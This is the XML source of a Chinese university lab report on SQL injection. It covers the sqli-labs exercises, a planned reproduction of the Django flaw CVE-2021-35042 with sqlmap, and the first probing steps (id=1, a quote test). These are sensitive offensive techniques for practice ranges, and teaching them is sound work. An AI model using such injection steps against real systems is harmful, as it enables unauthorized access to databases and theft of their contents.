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3359C" w14:textId="77777777" w:rsidR="007F4B05" w:rsidRDefault="007F4B05" w:rsidP="007F4B05">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>广州大学学生实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BAF0AD" w14:textId="63D77D56" w:rsidR="007F4B05" w:rsidRPr="001B505B" w:rsidRDefault="007F4B05" w:rsidP="007F4B05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B505B">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>开课学院及实验室：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F32443">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>计算机科学与工程实验室电子楼</w:t>
      </w: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>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>室</w:t>
      </w:r>
      <w:r w:rsidRPr="001B505B">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="003706E0">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2023</w:t>
      </w:r>
      <w:r w:rsidRPr="001B505B">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidR="00FA10C0">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="001B505B">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidR="00FA10C0">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="001B505B">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="95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7"/>
        <w:gridCol w:w="505"/>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="1121"/>
        <w:gridCol w:w="1326"/>
        <w:gridCol w:w="720"/>
        <w:gridCol w:w="1260"/>
        <w:gridCol w:w="720"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F4B05" w:rsidRPr="001B505B" w14:paraId="15CAD7AE" w14:textId="77777777" w:rsidTr="00C44FC7">
        <w:trPr>
          <w:trHeight w:val="615"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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2AFF39E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学院</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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321B4EA" w14:textId="7B4B2DAA" w:rsidR="007F4B05" w:rsidRPr="001B505B" w:rsidRDefault="002B77D9" w:rsidP="00BD1239">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络空间安全学院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F26378C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年级、专业、班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82DCBBA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FED7E8E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姓名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51CDB37" w14:textId="77777777" w:rsidR="007F4B05" w:rsidRPr="00B74164" w:rsidRDefault="007F4B05" w:rsidP="00BD1239">
            <w:pPr>
              <w:jc w:val="center"/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F12875A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学号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4DF4E47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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F4B05" w:rsidRPr="001B505B" w14:paraId="3D3B0DEF" w14:textId="77777777" w:rsidTr="00C44FC7">
        <w:trPr>
          <w:trHeight w:val="615"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1372" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21C0F88B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实验课程名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5615" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="030BA72B" w14:textId="55EBC575" w:rsidR="007F4B05" w:rsidRPr="007F4B05" w:rsidRDefault="0029241F" w:rsidP="00BD1239">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029241F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>网络空间安全综合演练</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="720" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7118D8B6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成绩</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="613EB1E2" w14:textId="77777777" w:rsidR="007F4B05" w:rsidRPr="00B74164" w:rsidRDefault="007F4B05" w:rsidP="00BD1239">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F4B05" w:rsidRPr="001B505B" w14:paraId="615DE0E4" w14:textId="77777777" w:rsidTr="00C44FC7">
        <w:trPr>
          <w:trHeight w:val="615"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1372" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D9253B5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实验项目名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5615" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11A1FDFB" w14:textId="5A217882" w:rsidR="007F4B05" w:rsidRPr="00FE66FA" w:rsidRDefault="00AE756F" w:rsidP="00FE66F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SQL</w:t>
            </w:r>
            <w:r w:rsidR="00585E3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入</w:t>
            </w:r>
            <w:r w:rsidR="007F4B05" w:rsidRPr="007F4B05">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>漏洞利用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="720" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E9934A4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指导老师</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="268542BC" w14:textId="2FE339CC" w:rsidR="007F4B05" w:rsidRPr="00D910EC" w:rsidRDefault="00B505CF" w:rsidP="00BD123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鲁辉</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69896650" w14:textId="77777777" w:rsidR="007F4B05" w:rsidRDefault="007F4B05" w:rsidP="007F4B05"/>
    <w:p w14:paraId="456BBBAD" w14:textId="4511B901" w:rsidR="006A7609" w:rsidRDefault="006A7609" w:rsidP="007F4B05">
      <w:r w:rsidRPr="006A7609">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>一、使用仪器、器材</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1791890B" w14:textId="3AC9A31C" w:rsidR="007F4B05" w:rsidRDefault="00DC1A02" w:rsidP="007F4B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机：</w:t>
      </w:r>
      <w:r w:rsidR="000579A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BA3885" w14:textId="4B837FC6" w:rsidR="00936763" w:rsidRDefault="00F254A1" w:rsidP="007F4B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶场</w:t>
      </w:r>
      <w:r w:rsidR="00C14E23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="006D67F1" w:rsidRPr="006D67F1">
        <w:t>sqli-labs</w:t>
      </w:r>
      <w:r w:rsidR="00A0505E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="008340EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00936763" w:rsidRPr="00E35FF4">
        <w:t>ulhub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BD5A97" w14:textId="68A811A8" w:rsidR="00372530" w:rsidRDefault="00372530" w:rsidP="007F4B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具：sqlmap、docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6906FB7C" w14:textId="77777777" w:rsidR="006A7609" w:rsidRPr="001B505B" w:rsidRDefault="006A7609" w:rsidP="007F4B05">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77101BB7" w14:textId="559BE73E" w:rsidR="0022664A" w:rsidRPr="00876D88" w:rsidRDefault="005673B2" w:rsidP="007F4B05">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r w:rsidR="007F4B05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="007F4B05" w:rsidRPr="001B505B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>实验内容及原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C758B56" w14:textId="6662A997" w:rsidR="00E35FF4" w:rsidRPr="0020212D" w:rsidRDefault="00876D88" w:rsidP="00E35FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020212D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00B931DD" w:rsidRPr="0020212D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00513E67" w:rsidRPr="0020212D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>练习靶场</w:t>
      </w:r>
      <w:r w:rsidR="00E35FF4" w:rsidRPr="0020212D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqli-labs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ED01E6" w14:textId="734CFF99" w:rsidR="00AA239C" w:rsidRDefault="00AA239C" w:rsidP="00DE0631">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）准备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FB0D74" w14:textId="2500B358" w:rsidR="00DE0631" w:rsidRDefault="00C711F7" w:rsidP="00DE0631">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考实验指导1，</w:t>
      </w:r>
      <w:r w:rsidR="00DE0631">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用phpstudy搭建</w:t>
      </w:r>
      <w:r w:rsidR="00DE0631" w:rsidRPr="00EE7304">
        <w:t>sqli-labs</w:t>
      </w:r>
      <w:r w:rsidR="00466E19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶场</w:t>
      </w:r>
      <w:r w:rsidR="0038332C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E97924" w14:textId="030685CA" w:rsidR="00513E67" w:rsidRDefault="00AA239C" w:rsidP="007F4B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00327398">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="008A1B77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8B218A" w14:textId="12AE750A" w:rsidR="00513E67" w:rsidRDefault="000E61A8" w:rsidP="007F4B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AC5218">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00B34D61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关卡</w:t>
      </w:r>
      <w:r w:rsidR="00AC5218">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Less-1中</w:t>
      </w:r>
      <w:r w:rsidR="00D554EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidR="002D6DBA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库库名</w:t>
      </w:r>
      <w:r w:rsidR="00525D55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="000601B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidR="00525D55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、字段名和字段内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EDED1D" w14:textId="747C00EF" w:rsidR="000E61A8" w:rsidRDefault="000E61A8" w:rsidP="007F4B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b.在</w:t>
      </w:r>
      <w:r w:rsidR="00B34D61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关卡</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Less-5中使用</w:t>
      </w:r>
      <w:r>
        <w:t>报错注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、布尔</w:t>
      </w:r>
      <w:r>
        <w:t>盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两种方法获取数据库库名</w:t>
      </w:r>
      <w:r w:rsidR="0051566D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BEF54A" w14:textId="77777777" w:rsidR="002E2CCE" w:rsidRPr="00525D55" w:rsidRDefault="002E2CCE" w:rsidP="007F4B05"/>
    <w:p w14:paraId="675C9BDE" w14:textId="522F9CF1" w:rsidR="00C56ECE" w:rsidRPr="005A2B08" w:rsidRDefault="00B931DD" w:rsidP="007F4B05">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2B08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2、</w:t>
      </w:r>
      <w:r w:rsidR="00513E67" w:rsidRPr="005A2B08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>实战靶场</w:t>
      </w:r>
      <w:r w:rsidR="008340EF" w:rsidRPr="005A2B08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00E35FF4" w:rsidRPr="005A2B08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ulhub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507DE64E" w14:textId="23DC5F00" w:rsidR="002047E0" w:rsidRDefault="00EB55A1" w:rsidP="007F4B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）</w:t>
      </w:r>
      <w:r w:rsidR="003B6078">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>准备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79902392" w14:textId="19B42EA4" w:rsidR="009056EF" w:rsidRDefault="009056EF" w:rsidP="007F4B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r w:rsidR="000F68D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验指导2</w:t>
      </w:r>
      <w:r w:rsidR="0088689B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，使用docker搭建v</w:t>
      </w:r>
      <w:r w:rsidR="0088689B" w:rsidRPr="00E35FF4">
        <w:t>ulhub</w:t>
      </w:r>
      <w:r w:rsidR="0088689B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶场。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F0C11E" w14:textId="3334D871" w:rsidR="00570306" w:rsidRDefault="00EB55A1" w:rsidP="007A01BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（2）</w:t>
      </w:r>
      <w:r w:rsidR="00570306">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7890B72E" w14:textId="21A69457" w:rsidR="003D3CF5" w:rsidRDefault="00D627D6" w:rsidP="007A01BD">
      <w:r w:rsidRPr="007A01BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复现</w:t>
      </w:r>
      <w:r w:rsidR="007A01BD" w:rsidRPr="007A01BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CVE-2021-35042</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="007A01BD" w:rsidRPr="007A01BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Django SQL注入漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00A075A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007D3D5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用sqlmap工具注出数据库库名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A73DEA" w14:textId="77777777" w:rsidR="004A136A" w:rsidRPr="001B505B" w:rsidRDefault="004A136A" w:rsidP="007F4B05">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577D4832" w14:textId="570E042E" w:rsidR="007F4B05" w:rsidRPr="00396192" w:rsidRDefault="00777172" w:rsidP="00777172">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>三、</w:t>
      </w:r>
      <w:r w:rsidR="007F4B05" w:rsidRPr="001B505B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>实验过程原始数据记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1CACDA" w14:textId="77777777" w:rsidR="00C45C0D" w:rsidRDefault="00C45C0D" w:rsidP="00C45C0D">
      <w:r>
        <w:t>1、练习靶场sqli-labs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76200E12" w14:textId="77777777" w:rsidR="00C45C0D" w:rsidRDefault="00C45C0D" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1）准备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C8B170" w14:textId="77777777" w:rsidR="00C45C0D" w:rsidRDefault="00C45C0D" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考实验指导</w:t>
      </w:r>
      <w:r>
        <w:t>1，使用phpstudy搭建sqli-labs靶场。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4BFAEB" w14:textId="77777777" w:rsidR="00C45C0D" w:rsidRDefault="00C45C0D" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>2）实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E5CC0F" w14:textId="77777777" w:rsidR="00C45C0D" w:rsidRDefault="00C45C0D" w:rsidP="00C45C0D">
      <w:r>
        <w:t>a.在关卡Less-1中获取数据库库名、表名、字段名和字段内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5F000E" w14:textId="274F731A" w:rsidR="00C45C0D" w:rsidRDefault="00EC5687" w:rsidP="00C45C0D">
      <w:r>
        <w:t>A:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A06E749" w14:textId="0EEA02A9" w:rsidR="00EC5687" w:rsidRDefault="00EC5687" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入id传参：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B335B4" w14:textId="2277E29B" w:rsidR="00EC5687" w:rsidRDefault="00EC5687" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C3D1C9D" wp14:editId="0F99E102">
            <wp:extent cx="5274310" cy="1720215"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="158462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218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380F" w14:textId="5D586EE5" w:rsidR="00EC5687" w:rsidRDefault="00EC5687" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传个表给他：i</w:t>
      </w:r>
      <w:r>
        <w:t>d=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6894FE5F" w14:textId="6AD7F986" w:rsidR="00EC5687" w:rsidRDefault="00EC5687" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A8C66F6" wp14:editId="0A8621A4">
            <wp:extent cx="5274310" cy="2081530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="60947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7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3AA7" w14:textId="19FFB95E" w:rsidR="00EC5687" w:rsidRDefault="00EC5687" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有登录账号字段，密码字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B466C4C" w14:textId="37B57554" w:rsidR="00EC5687" w:rsidRDefault="00EC5687" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜测：是不是检测字串？类似：id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>input（“input_</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”）或id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = input”input_id”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之类的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6236189D" w14:textId="4D72E6FC" w:rsidR="00EC5687" w:rsidRDefault="00EC5687" w:rsidP="00C45C0D">
      <w:r w:rsidRPr="00EC5687">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C143414" wp14:editId="7EB52E3A">
            <wp:extent cx="5274310" cy="1274445"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="109277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77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CBC4" w14:textId="11FF6F9E" w:rsidR="00EC5687" w:rsidRDefault="00EC5687" w:rsidP="00C45C0D">
      <w:r>
        <w:t>1’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被解析为1“ </w:t>
      </w:r>
      <w:r>
        <w:t>LIMIT 0,1</w:t>
      </w:r>
    </w:p>
